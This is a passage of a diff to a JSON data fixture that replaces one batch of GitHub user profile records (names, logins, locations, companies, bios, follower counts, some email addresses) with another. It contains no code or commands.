"2020-01-22T23:17:30Z", - "node_id": "MDQ6VXNlcjYxNTEwNjM=", + "following_count": 162, + "followers_count": 50, + "public_gists_count": 8, + "public_repositories_count": 51, + "created_at": "2013-01-08T13:38:25Z", + "updated_at": "2024-05-27T19:58:28Z", + "node_id": "MDQ6VXNlcjMyMTYxMjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380803,49 +637327,49 @@ }, { "model": "github.user", - "pk": 823, + "pk": 6057, "fields": { - "nest_created_at": "2024-09-11T22:10:18.695Z", - "nest_updated_at": "2024-09-11T22:10:18.695Z", - "name": "Michael Hidalgo", - "login": "michaelhidalgo", - "email": "michaelfallas@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1732035?v=4", - "company": "", - "location": "San José, Costa Rica", + "nest_created_at": "2024-09-22T06:44:09.000Z", + "nest_updated_at": "2024-09-22T18:30:44.379Z", + "name": "Steven Huang", + "login": "liquiddandruff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2075654?v=4", + "company": "@SFUSatClub ", + "location": "Vancouver", "collaborators_count": 0, - "following_count": 2, - "followers_count": 18, - "public_gists_count": 16, - "public_repositories_count": 136, - "created_at": "2012-05-12T05:22:01Z", - "updated_at": "2024-05-09T08:15:38Z", - "node_id": "MDQ6VXNlcjE3MzIwMzU=", - "bio": "Software Engineer and Application Security researcher based in Costa Rica. \r\n", + "following_count": 50, + "followers_count": 41, + "public_gists_count": 4, + "public_repositories_count": 61, + "created_at": "2012-08-01T06:33:19Z", + "updated_at": "2024-09-22T05:43:34Z", + "node_id": "MDQ6VXNlcjIwNzU2NTQ=", + "bio": "", "is_hireable": true, - "twitter_username": "michael_hidalgo" + "twitter_username": "" } }, { "model": "github.user", - "pk": 824, + "pk": 6058, "fields": { - "nest_created_at": "2024-09-11T22:10:37.276Z", - "nest_updated_at": "2024-09-11T22:10:37.276Z", + "nest_created_at": "2024-09-22T06:44:15.105Z", + "nest_updated_at": "2024-09-22T20:26:24.557Z", "name": "", - "login": "daniel5001", + "login": "natalilopez", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12633473?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13339833?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2015-05-27T21:41:43Z", - "updated_at": "2024-04-26T14:19:56Z", - "node_id": "MDQ6VXNlcjEyNjMzNDcz", + "public_repositories_count": 7, + "created_at": "2015-07-14T21:20:15Z", + "updated_at": "2023-10-06T13:04:39Z", + "node_id": "MDQ6VXNlcjEzMzM5ODMz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380853,24 +637377,24 @@ }, { "model": "github.user", - "pk": 825, + "pk": 6059, "fields": { - "nest_created_at": "2024-09-11T22:10:38.956Z", - "nest_updated_at": "2024-09-11T22:10:38.956Z", - "name": "", - "login": "githubname1", + "nest_created_at": "2024-09-22T06:44:15.421Z", + "nest_updated_at": "2024-09-22T20:26:24.867Z", + "name": "lei shao", + "login": "leishao2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11516698?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13755121?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2015-03-17T07:51:30Z", - "updated_at": "2020-04-19T20:02:50Z", - "node_id": "MDQ6VXNlcjExNTE2Njk4", + "public_repositories_count": 0, + "created_at": "2015-08-11T21:12:36Z", + "updated_at": "2020-05-12T14:32:17Z", + "node_id": "MDQ6VXNlcjEzNzU1MTIx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380878,49 +637402,49 @@ }, { "model": "github.user", - "pk": 826, + "pk": 6060, "fields": { - "nest_created_at": "2024-09-11T22:10:42.742Z", - "nest_updated_at": "2024-09-11T22:10:42.742Z", - "name": "Blessen Thomas", - "login": "pentagramz", - "email": "blessenthomas75@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7072014?v=4", + "nest_created_at": "2024-09-22T06:44:15.741Z", + "nest_updated_at": "2024-09-22T20:26:25.179Z", + "name": "JohnClarke", + "login": "JCFL-Dev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2584883?v=4", "company": "", - "location": "", + "location": "Ireland", "collaborators_count": 0, - "following_count": 62, - "followers_count": 16, + "following_count": 14, + "followers_count": 8, "public_gists_count": 4, - "public_repositories_count": 237, - "created_at": "2014-03-26T16:19:47Z", - "updated_at": "2024-05-29T22:24:51Z", - "node_id": "MDQ6VXNlcjcwNzIwMTQ=", - "bio": "Security Researcher | Trainer | Speaker ", + "public_repositories_count": 13, + "created_at": "2012-10-17T23:30:48Z", + "updated_at": "2024-07-09T10:01:01Z", + "node_id": "MDQ6VXNlcjI1ODQ4ODM=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 827, + "pk": 6061, "fields": { - "nest_created_at": "2024-09-11T22:10:44.422Z", - "nest_updated_at": "2024-09-11T22:10:57.115Z", + "nest_created_at": "2024-09-22T06:44:16.726Z", + "nest_updated_at": "2024-09-22T20:26:26.181Z", "name": "", - "login": "nytshadow", + "login": "cwavesoftware", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40641433?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13283745?v=4", + "company": "cWave SecDev Consulting", + "location": "Bucharest", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 1, + "followers_count": 22, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-06-27T18:01:53Z", - "updated_at": "2020-11-19T23:01:24Z", - "node_id": "MDQ6VXNlcjQwNjQxNDMz", + "public_repositories_count": 62, + "created_at": "2015-07-11T03:29:18Z", + "updated_at": "2024-09-18T02:30:20Z", + "node_id": "MDQ6VXNlcjEzMjgzNzQ1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380928,49 +637452,49 @@ }, { "model": "github.user", - "pk": 828, + "pk": 6062, "fields": { - "nest_created_at": "2024-09-11T22:10:59.180Z", - "nest_updated_at": "2024-09-11T22:11:01.684Z", - "name": "gbena", - "login": "gbena", + "nest_created_at": "2024-09-22T06:44:17.353Z", + "nest_updated_at": "2024-09-22T20:26:26.807Z", + "name": "francesca", + "login": "francescacoo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16888782?v=4", - "company": "Stark Industries", - "location": "Earth", + "avatar_url": "https://avatars.githubusercontent.com/u/1751355?v=4", + "company": "", + "location": "Berlin", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 7, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-01-25T23:22:37Z", - "updated_at": "2021-06-20T04:01:47Z", - "node_id": "MDQ6VXNlcjE2ODg4Nzgy", + "public_repositories_count": 40, + "created_at": "2012-05-18T06:01:59Z", + "updated_at": "2024-09-14T11:27:28Z", + "node_id": "MDQ6VXNlcjE3NTEzNTU=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 829, + "pk": 6063, "fields": { - "nest_created_at": "2024-09-11T22:10:59.587Z", - "nest_updated_at": "2024-09-11T22:10:59.587Z", + "nest_created_at": "2024-09-22T06:44:17.673Z", + "nest_updated_at": "2024-09-22T20:26:27.128Z", "name": "", - "login": "andrrac", + "login": "Securityinfos", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40352451?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5527336?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-06-18T07:52:20Z", - "updated_at": "2018-10-07T05:15:44Z", - "node_id": "MDQ6VXNlcjQwMzUyNDUx", + "public_repositories_count": 6, + "created_at": "2013-09-24T12:28:17Z", + "updated_at": "2024-09-17T14:58:49Z", + "node_id": "MDQ6VXNlcjU1MjczMzY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380978,99 +637502,99 @@ }, { "model": "github.user", - "pk": 830, + "pk": 6064, "fields": { - "nest_created_at": "2024-09-11T22:11:21.387Z", - "nest_updated_at": "2024-09-11T22:11:21.387Z", - "name": "Aditya Mistri", - "login": "aditya-mistri", + "nest_created_at": "2024-09-22T06:44:17.997Z", + "nest_updated_at": "2024-09-22T20:26:27.451Z", + "name": "Is misa Anks", + "login": "anksp21", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/123372823?v=4", - "company": "", - "location": "delhi", + "avatar_url": "https://avatars.githubusercontent.com/u/6217321?v=4", + "company": "student", + "location": "Dublin", "collaborators_count": 0, - "following_count": 5, + "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 41, - "created_at": "2023-01-23T11:30:05Z", - "updated_at": "2024-08-22T13:08:58Z", - "node_id": "U_kgDOB1qFFw", - "bio": "B.Tech undergraduate. ", + "public_repositories_count": 1, + "created_at": "2013-12-18T19:08:56Z", + "updated_at": "2019-02-20T09:57:24Z", + "node_id": "MDQ6VXNlcjYyMTczMjE=", + "bio": "", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 831, + "pk": 6065, "fields": { - "nest_created_at": "2024-09-11T22:11:26.905Z", - "nest_updated_at": "2024-09-11T22:11:32.745Z", - "name": "Rob Conan", - "login": "Rob-Conan", + "nest_created_at": "2024-09-22T06:44:18.313Z", + "nest_updated_at": "2024-09-22T20:26:27.762Z", + "name": "Bruce MacDonald", + "login": "BruceMacD", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5645045?v=4", - "company": "", - "location": "Dublin", + "avatar_url": "https://avatars.githubusercontent.com/u/5853428?v=4", + "company": "@ollama", + "location": "San Francisco Bay Area", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, - "public_gists_count": 4, - "public_repositories_count": 17, - "created_at": "2013-10-09T08:04:38Z", - "updated_at": "2024-02-20T15:16:48Z", - "node_id": "MDQ6VXNlcjU2NDUwNDU=", + "following_count": 66, + "followers_count": 410, + "public_gists_count": 1, + "public_repositories_count": 31, + "created_at": "2013-11-04T18:17:51Z", + "updated_at": "2024-08-22T00:43:41Z", + "node_id": "MDQ6VXNlcjU4NTM0Mjg=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "_bmacd" } }, { "model": "github.user", - "pk": 832, + "pk": 6066, "fields": { - "nest_created_at": "2024-09-11T22:11:34Z", - "nest_updated_at": "2024-09-11T22:11:34.392Z", - "name": "Bram", - "login": "brampat", - "email": "bram.msn@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3624563?v=4", - "company": "Ordina", + "nest_created_at": "2024-09-22T06:44:18.951Z", + "nest_updated_at": "2024-09-22T20:26:28.395Z", + "name": "Abhinav Konda", + "login": "abhinav-k", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5916235?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 13, - "followers_count": 15, - "public_gists_count": 1, + "followers_count": 4, + "public_gists_count": 0, "public_repositories_count": 15, - "created_at": "2013-02-18T09:02:21Z", - "updated_at": "2024-08-05T12:16:04Z", - "node_id": "MDQ6VXNlcjM2MjQ1NjM=", + "created_at": "2013-11-12T05:06:55Z", + "updated_at": "2023-12-03T14:52:14Z", + "node_id": "MDQ6VXNlcjU5MTYyMzU=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 833, + "pk": 6067, "fields": { - "nest_created_at": "2024-09-11T22:11:36.043Z", - "nest_updated_at": "2024-09-11T22:11:36.044Z", - "name": "Ryan James", - "login": "ryanjames85", + "nest_created_at": "2024-09-22T06:44:19.280Z", + "nest_updated_at": "2024-09-22T20:26:28.713Z", + "name": "", + "login": "smohtadi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16687982?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/35548492?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-01-13T15:41:07Z", - "updated_at": "2024-07-16T22:28:14Z", - "node_id": "MDQ6VXNlcjE2Njg3OTgy", + "public_repositories_count": 0, + "created_at": "2018-01-18T01:06:26Z", + "updated_at": "2024-04-24T16:26:13Z", + "node_id": "MDQ6VXNlcjM1NTQ4NDky", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381078,24 +637602,24 @@ }, { "model": "github.user", - "pk": 834, + "pk": 6068, "fields": { - "nest_created_at": "2024-09-11T22:11:37.319Z", - "nest_updated_at": "2024-09-11T22:11:39.387Z", - "name": "", - "login": "Samuel-BF", + "nest_created_at": "2024-09-22T06:44:19.937Z", + "nest_updated_at": "2024-09-22T20:26:29.391Z", + "name": "Prateep Bandharangshi", + "login": "prateepb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36996277?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4638398?v=4", "company": "", - "location": "Paris", + "location": "Dublin", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, + "following_count": 4, + "followers_count": 17, "public_gists_count": 1, - "public_repositories_count": 27, - "created_at": "2018-03-02T16:19:20Z", - "updated_at": "2024-09-04T20:08:22Z", - "node_id": "MDQ6VXNlcjM2OTk2Mjc3", + "public_repositories_count": 6, + "created_at": "2013-06-07T08:33:48Z", + "updated_at": "2021-10-05T09:15:28Z", + "node_id": "MDQ6VXNlcjQ2MzgzOTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381103,49 +637627,49 @@ }, { "model": "github.user", - "pk": 835, + "pk": 6069, "fields": { - "nest_created_at": "2024-09-11T22:11:41.446Z", - "nest_updated_at": "2024-09-11T22:11:41.446Z", - "name": "Paolo del Mundo", - "login": "paolodm", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/247525?v=4", - "company": "", - "location": "Washington DC", + "nest_created_at": "2024-09-22T06:44:20.251Z", + "nest_updated_at": "2024-09-22T20:26:29.709Z", + "name": "Paul Chaignon", + "login": "pchaigno", + "email": "paul.chaignon@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1764210?v=4", + "company": "Isovalent", + "location": "Rennes, France", "collaborators_count": 0, - "following_count": 44, - "followers_count": 21, - "public_gists_count": 3, - "public_repositories_count": 98, - "created_at": "2010-04-19T18:14:43Z", - "updated_at": "2024-07-10T20:15:40Z", - "node_id": "MDQ6VXNlcjI0NzUyNQ==", - "bio": "", + "following_count": 92, + "followers_count": 384, + "public_gists_count": 33, + "public_repositories_count": 119, + "created_at": "2012-05-22T11:07:54Z", + "updated_at": "2024-09-22T12:53:24Z", + "node_id": "MDQ6VXNlcjE3NjQyMTA=", + "bio": "Software engineer at Isovalent. Personal & pro. account.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "pchaigno" } }, { "model": "github.user", - "pk": 836, + "pk": 6070, "fields": { - "nest_created_at": "2024-09-11T22:11:43.153Z", - "nest_updated_at": "2024-09-11T22:11:43.153Z", - "name": "", - "login": "Elmeche", + "nest_created_at": "2024-09-22T06:44:20.904Z", + "nest_updated_at": "2024-09-22T20:26:30.339Z", + "name": "Andrew Stubbs", + "login": "Andrew-Stubbs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49430274?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11270059?v=4", + "company": "@CACI-IIG ", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-04-09T07:03:36Z", - "updated_at": "2024-04-24T04:32:20Z", - "node_id": "MDQ6VXNlcjQ5NDMwMjc0", + "public_repositories_count": 9, + "created_at": "2015-03-02T11:29:10Z", + "updated_at": "2024-09-17T08:35:13Z", + "node_id": "MDQ6VXNlcjExMjcwMDU5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381153,124 +637677,124 @@ }, { "model": "github.user", - "pk": 837, + "pk": 6071, "fields": { - "nest_created_at": "2024-09-11T22:11:46.580Z", - "nest_updated_at": "2024-09-11T22:11:58.474Z", - "name": "Jonathan Jogenfors", - "login": "etnoy", - "email": "jonathan@jogenfors.se", - "avatar_url": "https://avatars.githubusercontent.com/u/135728?v=4", - "company": "OpenText Cybersecurity", - "location": "Sweden", + "nest_created_at": "2024-09-22T06:44:21.536Z", + "nest_updated_at": "2024-09-22T20:26:30.976Z", + "name": "arsenkhy", + "login": "arsenkhy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77200251?v=4", + "company": "", + "location": "Burnaby, BC, Canada", "collaborators_count": 0, - "following_count": 16, - "followers_count": 17, + "following_count": 1, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2009-10-06T11:17:34Z", - "updated_at": "2024-08-17T11:19:13Z", - "node_id": "MDQ6VXNlcjEzNTcyOA==", - "bio": "Application Security Professional @ Fortify. Immich contributor.", + "public_repositories_count": 36, + "created_at": "2021-01-09T14:31:48Z", + "updated_at": "2024-09-11T22:08:53Z", + "node_id": "MDQ6VXNlcjc3MjAwMjUx", + "bio": "", "is_hireable": false, - "twitter_username": "jogenfors" + "twitter_username": "" } }, { "model": "github.user", - "pk": 838, + "pk": 6072, "fields": { - "nest_created_at": "2024-09-11T22:11:57.589Z", - "nest_updated_at": "2024-09-11T22:11:57.589Z", - "name": "François Capon", - "login": "FrancoisCapon", + "nest_created_at": "2024-09-22T06:44:22.173Z", + "nest_updated_at": "2024-09-22T20:26:31.688Z", + "name": "0xf00", + "login": "caligin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46624375?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3680419?v=4", "company": "", - "location": "France, Vaucluse", + "location": "London", "collaborators_count": 0, - "following_count": 0, - "followers_count": 40, - "public_gists_count": 8, - "public_repositories_count": 30, - "created_at": "2019-01-12T11:54:36Z", - "updated_at": "2024-06-19T21:51:04Z", - "node_id": "MDQ6VXNlcjQ2NjI0Mzc1", - "bio": "", + "following_count": 20, + "followers_count": 30, + "public_gists_count": 13, + "public_repositories_count": 58, + "created_at": "2013-02-23T18:19:48Z", + "updated_at": "2024-06-21T19:31:24Z", + "node_id": "MDQ6VXNlcjM2ODA0MTk=", + "bio": "Cyber!", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 839, + "pk": 6073, "fields": { - "nest_created_at": "2024-09-11T22:11:59.684Z", - "nest_updated_at": "2024-09-11T22:11:59.684Z", - "name": "", - "login": "LukeParsnips", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42177814?v=4", + "nest_created_at": "2024-09-22T06:44:22.489Z", + "nest_updated_at": "2024-09-22T20:31:15.024Z", + "name": "Thomas Preece", + "login": "thomaspreece", + "email": "github@thomaspreece.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2067021?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-08-07T13:09:22Z", - "updated_at": "2022-12-10T19:26:37Z", - "node_id": "MDQ6VXNlcjQyMTc3ODE0", + "public_repositories_count": 54, + "created_at": "2012-07-30T19:29:30Z", + "updated_at": "2024-08-21T19:27:41Z", + "node_id": "MDQ6VXNlcjIwNjcwMjE=", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "thomaswpreece" } }, { "model": "github.user", - "pk": 840, + "pk": 6074, "fields": { - "nest_created_at": "2024-09-11T22:12:06.871Z", - "nest_updated_at": "2024-09-11T22:12:06.871Z", - "name": "", - "login": "40R40L", + "nest_created_at": "2024-09-22T06:44:22.902Z", + "nest_updated_at": "2024-09-22T20:26:32.327Z", + "name": "Tejen Patel", + "login": "tejen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45973969?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1665102?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-12-18T15:39:44Z", - "updated_at": "2021-01-01T21:06:03Z", - "node_id": "MDQ6VXNlcjQ1OTczOTY5", - "bio": "", - "is_hireable": false, + "following_count": 92, + "followers_count": 174, + "public_gists_count": 4, + "public_repositories_count": 25, + "created_at": "2012-04-21T07:31:17Z", + "updated_at": "2024-08-31T23:28:20Z", + "node_id": "MDQ6VXNlcjE2NjUxMDI=", + "bio": "@UCSD", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 841, + "pk": 6075, "fields": { - "nest_created_at": "2024-09-11T22:12:14.405Z", - "nest_updated_at": "2024-09-11T22:12:14.405Z", - "name": "", - "login": "anquanbiji", + "nest_created_at": "2024-09-22T06:44:23.224Z", + "nest_updated_at": "2024-09-22T20:26:32.643Z", + "name": "Spencer Niemi", + "login": "SpencerLN", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/76862089?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6659148?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2021-01-02T06:35:13Z", - "updated_at": "2022-05-15T09:36:34Z", - "node_id": "MDQ6VXNlcjc2ODYyMDg5", + "public_repositories_count": 14, + "created_at": "2014-02-12T08:19:30Z", + "updated_at": "2024-09-21T14:46:13Z", + "node_id": "MDQ6VXNlcjY2NTkxNDg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381278,24 +637802,24 @@ }, { "model": "github.user", - "pk": 842, + "pk": 6076, "fields": { - "nest_created_at": "2024-09-11T22:12:19.565Z", - "nest_updated_at": "2024-09-11T22:12:35.375Z", - "name": "Jeremiah", - "login": "jmarquez90", + "nest_created_at": "2024-09-22T06:44:23.542Z", + "nest_updated_at": "2024-09-22T20:26:32.954Z", + "name": "Saren Currie", + "login": "SarenCurrie", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23003959?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8222891?v=4", "company": "", - "location": "", + "location": "London", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-10-22T20:21:39Z", - "updated_at": "2024-03-29T15:14:31Z", - "node_id": "MDQ6VXNlcjIzMDAzOTU5", + "following_count": 3, + "followers_count": 8, + "public_gists_count": 3, + "public_repositories_count": 40, + "created_at": "2014-07-21T09:52:48Z", + "updated_at": "2024-05-23T14:25:49Z", + "node_id": "MDQ6VXNlcjgyMjI4OTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381303,49 +637827,99 @@ }, { "model": "github.user", - "pk": 843, + "pk": 6077, "fields": { - "nest_created_at": "2024-09-11T22:12:36.597Z", - "nest_updated_at": "2024-09-11T22:12:37.845Z", - "name": "rudosch", - "login": "rudosch", + "nest_created_at": "2024-09-22T06:44:23.861Z", + "nest_updated_at": "2024-09-22T20:26:33.278Z", + "name": "Rahul Saxena", + "login": "saxenism", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52255659?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/32522659?v=4", + "company": "Bluethroat Labs", + "location": "India", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 183, + "public_gists_count": 41, + "public_repositories_count": 106, + "created_at": "2017-10-04T17:37:37Z", + "updated_at": "2024-09-15T05:50:35Z", + "node_id": "MDQ6VXNlcjMyNTIyNjU5", + "bio": "Working towards a decentralised future. EVM Auditing + Research + Development", + "is_hireable": true, + "twitter_username": "saxenism" + } +}, +{ + "model": "github.user", + "pk": 6078, + "fields": { + "nest_created_at": "2024-09-22T06:44:24.174Z", + "nest_updated_at": "2024-09-22T20:26:33.602Z", + "name": "IncredInComp", + "login": "incredincomp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43874843?v=4", "company": "", - "location": "", + "location": "Arizona", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2019-06-26T17:54:46Z", - "updated_at": "2023-03-07T14:51:27Z", - "node_id": "MDQ6VXNlcjUyMjU1NjU5", - "bio": "", + "public_gists_count": 2, + "public_repositories_count": 34, + "created_at": "2018-10-05T07:36:59Z", + "updated_at": "2024-09-18T17:29:31Z", + "node_id": "MDQ6VXNlcjQzODc0ODQz", + "bio": "Really, really good at breaking things that work awesome as is. Mediocre at fixing things that I break. I pretend to dev, I just like breaking what you built", + "is_hireable": true, + "twitter_username": "incredincomp" + } +}, +{ + "model": "github.user", + "pk": 6079, + "fields": { + "nest_created_at": "2024-09-22T06:44:24.487Z", + "nest_updated_at": "2024-09-22T20:26:33.918Z", + "name": "Neil Matatall", + "login": "oreoshake", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/448516?v=4", + "company": "", + "location": "Kailua Kona, HI", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 175, + "public_gists_count": 45, + "public_repositories_count": 19, + "created_at": "2010-10-21T16:52:01Z", + "updated_at": "2024-06-20T18:28:55Z", + "node_id": "MDQ6VXNlcjQ0ODUxNg==", + "bio": "I used to make it easier for others to secure this website.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ndm" } }, { "model": "github.user", - "pk": 844, + "pk": 6080, "fields": { - "nest_created_at": "2024-09-11T22:12:40.326Z", - "nest_updated_at": "2024-09-11T22:12:40.326Z", - "name": "Malte Skoruppa", - "login": "malte-skoruppa-sonarsource", + "nest_created_at": "2024-09-22T06:44:24.804Z", + "nest_updated_at": "2024-09-22T20:26:34.228Z", + "name": "Matt Flanagan", + "login": "mattflanagan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64034108?v=4", - "company": "SonarSource", - "location": "Bochum", + "avatar_url": "https://avatars.githubusercontent.com/u/404857?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-04-20T17:29:10Z", - "updated_at": "2024-08-21T12:26:33Z", - "node_id": "MDQ6VXNlcjY0MDM0MTA4", + "public_repositories_count": 4, + "created_at": "2010-09-17T17:06:01Z", + "updated_at": "2023-08-06T01:36:49Z", + "node_id": "MDQ6VXNlcjQwNDg1Nw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381353,74 +637927,74 @@ }, { "model": "github.user", - "pk": 845, + "pk": 6081, "fields": { - "nest_created_at": "2024-09-11T22:12:41.551Z", - "nest_updated_at": "2024-09-11T22:12:41.551Z", - "name": "Max Moser", - "login": "mmhdbw", + "nest_created_at": "2024-09-22T06:44:25.128Z", + "nest_updated_at": "2024-09-22T20:26:34.564Z", + "name": "Joakim Argillander", + "login": "argillander", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/77432537?v=4", - "company": "HDBW - Hochschule der Bayerischen Wirtschaft", - "location": "München", + "avatar_url": "https://avatars.githubusercontent.com/u/5502150?v=4", + "company": "Linköping University", + "location": "Linköping", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2021-01-14T07:41:12Z", - "updated_at": "2024-06-26T10:10:16Z", - "node_id": "MDQ6VXNlcjc3NDMyNTM3", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 15, + "followers_count": 16, + "public_gists_count": 2, + "public_repositories_count": 32, + "created_at": "2013-09-20T14:00:46Z", + "updated_at": "2024-09-13T12:01:43Z", + "node_id": "MDQ6VXNlcjU1MDIxNTA=", + "bio": "Ph.D. student, engineer (M.Sc) and cybersecurity enthusiast. \r\n\r\nTaking every opportunity to delve into the latest and greatest novel cryptography schemes.", + "is_hireable": true, + "twitter_username": "argillander1" } }, { "model": "github.user", - "pk": 846, + "pk": 6082, "fields": { - "nest_created_at": "2024-09-11T22:12:42.764Z", - "nest_updated_at": "2024-09-11T22:12:42.764Z", - "name": "", - "login": "Mossaki", + "nest_created_at": "2024-09-22T06:44:25.813Z", + "nest_updated_at": "2024-09-22T20:26:35.216Z", + "name": "Deepanshu Gajbhiye", + "login": "d78ui98", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/149950111?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/27950739?v=4", "company": "", - "location": "", + "location": "Riyadh, Saudi Arabia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-05T14:14:59Z", - "updated_at": "2023-11-05T14:57:23Z", - "node_id": "U_kgDOCPAOnw", - "bio": "", + "following_count": 6, + "followers_count": 40, + "public_gists_count": 7, + "public_repositories_count": 49, + "created_at": "2017-04-24T08:40:00Z", + "updated_at": "2024-09-16T13:51:57Z", + "node_id": "MDQ6VXNlcjI3OTUwNzM5", + "bio": "Security Consultant | Speaker | open source contributor", "is_hireable": false, - "twitter_username": "" + "twitter_username": "deep0x00" } }, { "model": "github.user", - "pk": 847, + "pk": 6083, "fields": { - "nest_created_at": "2024-09-11T22:12:43.610Z", - "nest_updated_at": "2024-09-11T22:12:43.610Z", + "nest_created_at": "2024-09-22T06:44:26.129Z", + "nest_updated_at": "2024-09-22T20:26:35.537Z", "name": "", - "login": "aaucestova", + "login": "CiaranNapier", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/125047946?v=4", + "avatar_url": 